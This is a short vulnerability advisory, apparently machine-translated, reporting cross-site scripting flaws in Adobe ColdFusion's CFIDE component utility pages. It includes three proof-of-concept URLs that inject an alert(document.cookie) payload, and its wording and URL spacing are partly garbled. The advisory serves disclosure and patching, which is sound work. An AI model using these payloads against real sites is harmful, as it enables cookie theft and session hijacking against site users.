Multiple Cross-Site Scripting Vulnerabilities in Adobe ColdFusion

Release date:
Updated on:

Affected Systems:
Adobe ColdFusion
Description:
--------------------------------------------------------------------------------
Bugtraq id: 49787

Adobe ColdFusion is a dynamic Web server.

Adobe ColdFusion has multiple cross-site scripting vulnerabilities. Remote attackers can exploit these vulnerabilities to execute arbitrary script code on the affected site and steal cookie authentication creden.

<* Source: MustLive (mustlive@websecurity.com.ua)
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

MustLive (mustlive@websecurity.com.ua) provides the following test methods:
Http://example.com/CFIDE/componentutils/componentdetail.cfm? Component = % 3 Cbody % 20 onload = alert (document. cookie) % 3E

Http://example.com/CFIDE/componentutils/cfcexplorer.cfc? Method = getcfcinhtml & amp; name = % 3 Cbody % 20 onload = alert (document. cookie) % 3E

Http://example.com/CFIDE/componentutils/cfcexplorer.cfc? Method = % 3 Cbody % 20 onload = alert (document. cookie) % 3E

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

Adobe
-----
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

Http://www.adobe.com